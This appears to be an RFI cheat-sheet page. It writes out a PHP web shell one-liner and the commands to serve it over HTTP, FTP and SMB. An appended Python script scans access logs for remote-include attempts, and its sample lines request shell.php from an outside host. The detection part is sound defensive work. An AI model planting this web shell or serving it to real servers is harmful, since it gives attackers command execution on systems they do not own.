RFI
Almost any RFI vulnerability is also an LFI vulnerability, as any function that allows including remote URLs usually also allows including local ones. However, an LFI is not necessarily an RFI, primarily for three reasons:
The vulnerable function may not allow including remote URLs.
You may only control a portion of the filename and not the entire protocol wrapper (ex: http://, ftp://, https://).
The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default.
Remote Code Execution
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
HTTP
$ sudo python3 -m http.server <LISTENING_PORT>
FTP
$ sudo python -m pyftpdlib -p 21
SMB
$ impacket-smbserver -smb2support share $(pwd)
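
The detection side of the three delivery channels above, as an added example that is not part of the original page: a Python scan of web access logs for query parameters whose decoded value starts with http://, https://, ftp:// or an SMB UNC path. The log lines, IP addresses and the `language` parameter name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Wrappers named on this page, plus a UNC prefix (\\host\share) for SMB-hosted files.
# Anchored at the start: the value must *begin* with the remote location.
REMOTE_PREFIX = re.compile(r'^(?:(https?|ftp)://|\\\\[^\\/]+[\\/])', re.I)

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def remote_include_params(target):
    """Return [(param, kind, decoded_value)] for query values pointing at a remote file."""
    hits = []
    query = target.partition('?')[2]
    # parse_qsl percent-decodes, so ftp%3A%2F%2F and %5C%5C are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = REMOTE_PREFIX.match(value.strip())
        if m:
            kind = m.group(1).lower() if m.group(1) else 'smb'
            hits.append((name, kind, value))
    return hits

def scan(lines):
    """Return [(line_number, param, kind, decoded_value)] for every suspicious request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for name, kind, value in remote_include_params(m.group(1)):
            findings.append((lineno, name, kind, value))
    return findings

# Constructed sample log lines (documentation address ranges, hypothetical parameter).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=http://198.51.100.9:8080/shell.php HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=ftp%3A%2F%2F198.51.100.9%2Fshell.php HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?language=%5C%5C198.51.100.9%5Cshare%5Cshell.php HTTP/1.1" 200 734',
    '203.0.113.8 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=what+is+http://+for HTTP/1.1" 200 90',
]

if __name__ == '__main__':
    for lineno, name, kind, value in scan(SAMPLE_LOG):
        print(f'line {lineno}: param={name} kind={kind} value={value}')
```

Access logs only record the query string, so values sent in a POST body need the same check applied at the application or WAF layer.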